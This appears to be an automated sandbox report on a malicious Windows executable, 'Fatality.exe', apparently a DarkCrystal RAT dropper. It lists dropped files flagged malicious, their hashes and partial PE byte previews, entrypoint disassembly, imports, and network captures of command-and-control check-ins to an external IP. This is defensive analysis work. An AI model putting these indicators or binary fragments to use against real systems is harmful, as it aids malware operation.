                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\UXzikyum.log

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\XAjYjGFx.log

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\nKZvhtVR.log

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\pMLeDcaM.log

                                    Download File
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\rfcELAFu.log

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\vVSvSxGn.log

                                    Download File
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1224
                                    Entropy (8bit):4.435108676655666
                                    Encrypted:false
                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                    Malicious:false
                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                    C:\Windows\System32\SecurityHealthSystray.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.9936379394153056
                                    Encrypted:false
                                    SSDEEP:48:6ADprPt0qM7Jt8Bs3FJsdcV4MKe27JdcFvqBHOOulajfqXSfbNtm:PBPG3Pc+Vx9MoFvkocjRzNt
                                    MD5:E0C377614DF2282E2514CD8F13CB3033
                                    SHA1:0CD943F58F9283E072BEBB8EB20833CA46E67EAF
                                    SHA-256:E04DF35285E3F0A59F9CEC7A2086992C26423442C9D76659DF79B4CB1F5474F3
                                    SHA-512:19E4B61FB176644A01037BDEB533A6925AD33F8A90CA79477A5B31978B47E680733A4E008DABD3AE1EE3FBB0B2CC55127961948F6DE65D537A4090EADCD8C776
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.f.............................'... ...@....@.. ....................................@..................................'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..d.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.4.......#GUID...D... ...#Blob...........WU........%3................................................................

                                    \Device\Null

                                    Download File
                                    Process:C:\Windows\System32\PING.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):502
                                    Entropy (8bit):4.630609828667227
                                    Encrypted:false
                                    SSDEEP:12:PRW5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:pQdUOAokItULVDv
                                    MD5:FAF2117F1A3B4F701E223DF5890958E7
                                    SHA1:BDE718A7349579D70F1AD26BE34E30DB83B6B905
                                    SHA-256:6927C90DBAEAED90DC8FBD46C43097F5EAB5AEA5A3C0BEFD4E5613C1C10280C3
                                    SHA-512:D20170DB924BF0167C03F0E0D2F5B6869A548E1B07A2E3AF0EC9BF94895B9425F82BE5001BBF785EEF60263FB59CEDD880BBA03316443826F3FD40A425C25FCB
                                    Malicious:false
                                    Preview:..Pinging 238576 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.658102585626772
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Fatality.exe
                                    File size:3'517'117 bytes
                                    MD5:a5a9cde94b59bc5b8b88d60fc28177d3
                                    SHA1:aba15bc72cdeb915369b481926676f0a452d6dcc
                                    SHA256:4ddd25095cce5dadc01782611513331e9fb1e37746adc5501a5b27c2b7aecfa6
                                    SHA512:31b3a40e94319011702b680ec2623ab8132928dade90694027c471dc11304251f2880ee151ce1e42cc1da2880bb03b279bbcb617b9c723fe776ba35d13a1bb62
                                    SSDEEP:98304:gWHg7lN8JPnn6JckFDpcistUDpLfZpkSvbE:gVlkEpfsqlYeo
                                    TLSH:ACF5CE05A5D14EFEC2634AF3416E073D52919E2E6531EB0F378E31D66A376B08B621B3
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                    File Icon

                                    Icon Hash:32f8cc6971703121

                                    Static PE Info

                                    General

                                    Entrypoint:0x417172
                                    Entrypoint Section:
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:d89f3dcdac0c8dba11dc1162435bedbb

                                    Entrypoint Preview

                                    Instruction
                                    call 00007FAB5926FF46h
                                    jmp 00007FAB5926FD5Eh
                                    push 0044BB60h
                                    push dword ptr fs:[00000000h]
                                    mov eax, dword ptr [esp+10h]
                                    mov dword ptr [esp+10h], ebp
                                    lea ebp, dword ptr [esp+10h]
                                    sub esp, eax
                                    push ebx
                                    push esi
                                    push edi
                                    mov eax, dword ptr [00466ECCh]
                                    xor dword ptr [ebp-04h], eax
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-18h], esp
                                    push dword ptr [ebp-08h]
                                    mov eax, dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                    mov dword ptr [ebp-08h], eax
                                    lea eax, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    mov ecx, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], ecx
                                    pop ecx
                                    pop edi
                                    pop edi
                                    pop esi
                                    pop ebx
                                    mov esp, ebp
                                    pop ebp
                                    push ecx
                                    ret
                                    int3
                                    int3
                                    int3
                                    add esp, 04h
                                    jmp 00007FAB596ADD19h
                                    mov dh, 09h
                                    mov bh, 54h
                                    and ebx, esi
                                    enter 574Eh, E1h
                                    pop edx
                                    jnl 00007FAB5926FF57h
                                    dec esp
                                    mov edi, FF69B4A9h
                                    fcmove st(0), st(5)
                                    lodsb
                                    or dword ptr [edi-75B13E42h], ecx
                                    mov edx, B151199Eh
                                    xchg eax, ebx
                                    pop edx
                                    mov ebx, 123E1086h
                                    movsd
                                    inc ebx
                                    adc dword ptr [edx+ebp*2], FFFFFFDDh
                                    jnl 00007FAB5926FEA7h
                                    lds edx, fword ptr [eax-465D38AAh]
                                    mov ecx, 5A52710Dh
                                    mov edx, 9D1A440Dh
                                    sbb ebp, dword ptr [ebx+esi*4+54h]
                                    das
                                    jc 00007FAB5926FEF4h
                                    push ds
                                    jnl 0000FE8Ch
                                    sub al, 61h
                                    pop ss
                                    leave
                                    lodsb
                                    stc
                                    sub dh, byte ptr [ebx]
                                    out 03h, al
                                    mov esi, 000216DFh

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x3710200x34cheat
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3710540x210cheat
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x43d2c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3710000xccheat
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x320000x1be00ba5b42c7670897607f3d2d0524658b40False0.9972848934977578data7.996936789356691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x330000xb0000x4800059a7800974553e470fb1ccc9bba4f2fFalse0.9947916666666666DOS executable (COM)7.977874239971029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x3e0000x250000x800adece09e33fd2b88c1b6d54c5e93890aFalse0.91162109375data7.478628519160346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x630000x10000x2006d21bdb7b83703222752122111af3cb3False0.447265625data3.7577890770502353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x640000x470000x2600348b7326b7eb987cd0e4811e6a604583False0.9837582236842105data7.946335906125016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0xab0000x30000x200062643a6822ccfeaf1a7770f81d11d870False0.9586181640625data7.85259808088101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xae0000x440000x43e00eb48ca90d4ec3120505afdcc40ff5f47False0.13265423572744015data3.1130938069043013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0xf20000x27f0000x2ba00770f2e39817cfa2d569a17e7190e6266unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    cheat0x3710000xe70000xe6c00ab6b88713a4cb5b99ad40799fd0189c6False0.9969740316901409data7.985166472762615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    PNG0x645240xb45dataEnglishUnited States1.0038128249566725
                                    PNG0x6506c0x15a9dataEnglishUnited States0.972664735698769
                                    RT_ICON0xae5240x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.12581368168772375
                                    RT_DIALOG0xa86400x286emptyEnglishUnited States0
                                    RT_DIALOG0xa88c80x13aemptyEnglishUnited States0
                                    RT_DIALOG0xa8a040xecemptyEnglishUnited States0
                                    RT_DIALOG0xa8af00x12eemptyEnglishUnited States0
                                    RT_DIALOG0xa8c200x338emptyEnglishUnited States0
                                    RT_DIALOG0xa8f580x252emptyEnglishUnited States0
                                    RT_STRING0xf054c0x1e2dataEnglishUnited States0.3900414937759336
                                    RT_STRING0xf07300x1ccdataEnglishUnited States0.4282608695652174
                                    RT_STRING0xf08fc0x1b8dataEnglishUnited States0.45681818181818185
                                    RT_STRING0xf0ab40x146dataEnglishUnited States0.5153374233128835
                                    RT_STRING0xf0bfc0x46cdataEnglishUnited States0.3454063604240283
                                    RT_STRING0xf10680x166dataEnglishUnited States0.49162011173184356
                                    RT_STRING0xf11d00x152dataEnglishUnited States0.5059171597633136
                                    RT_STRING0xf13240x10adataEnglishUnited States0.49624060150375937
                                    RT_STRING0xf14300xbcdataEnglishUnited States0.6329787234042553
                                    RT_STRING0xf14ec0xd6dataEnglishUnited States0.5747663551401869
                                    RT_GROUP_ICON0xf15c40x14data1.1
                                    RT_MANIFEST0xf15d80x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                    Imports

                                    DLLImport
                                    kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                    user32.dllMessageBoxA
                                    advapi32.dllRegCloseKey
                                    oleaut32.dllSysFreeString
                                    gdi32.dllCreateFontA
                                    shell32.dllShellExecuteA
                                    version.dllGetFileVersionInfoA
                                    gdiplus.dllGdipAlloc

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                    2024-08-25T15:43:31.655901+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971880192.168.2.680.211.144.156

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 25, 2024 15:43:30.881634951 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:30.886842966 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:30.888567924 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:30.889875889 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:30.894834042 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.249459028 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:31.254350901 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.562022924 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.655786037 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.655832052 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.655900955 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:31.696103096 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:31.701077938 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.901365995 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.901577950 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:31.906564951 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.992362976 CEST4971980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:31.997478008 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:31.997577906 CEST4971980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:31.997689009 CEST4971980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.002832890 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.201215029 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.245140076 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.342020988 CEST4971980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.347094059 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.347243071 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.347306013 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.361114025 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.366127968 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.612957001 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.613209009 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.618202925 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.618232965 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.700649023 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.747828960 CEST4971980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.829896927 CEST804971980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.872847080 CEST4971980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:32.905910969 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:32.951046944 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:33.208328009 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:33.209501982 CEST4972280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:33.214495897 CEST804971880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:33.214549065 CEST4971880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:33.214631081 CEST804972280.211.144.156192.168.2.6
